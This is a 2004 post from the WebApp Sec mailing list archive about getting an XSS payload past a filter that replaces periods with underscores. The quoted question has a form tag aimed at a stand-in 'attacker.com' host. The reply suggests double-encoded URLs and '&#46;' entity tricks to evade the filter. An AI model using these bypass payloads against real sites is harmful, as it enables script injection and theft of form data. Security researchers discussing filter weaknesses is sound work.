Home page logo
/

webappsec logo WebApp Sec mailing list archives

Re: Fullstop Substitution in XSS
From: Jonathan Stade <jstade () mtroyal ca>
Date: Tue, 01 Jun 2004 13:38:46 -0600

On Tue, 2004-06-01 at 00:03, windo () windowlicker dyn ee wrote:
Hey.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script";> is of course being filtered
into: <form target="http://attacker_com/path/to/script";>

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Of course i dont know how the substitution works, but double encoding like
this MIGHT work:

print.php?print=%3Ca%20href=%22http://www%26%2346;google%26%2346;com/%22%3Egoogle%3C/a%3E

print.php does what you described in a very basic manner, prints the
input substituting any '.' with '_'.

Along similar lines, another thing to try might be to use the HTML
entity &#46; which is a period/fullstop, and also try using the entity,
but unicode encode it. Not sure if that will work, it was just something
that popped into my head.


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault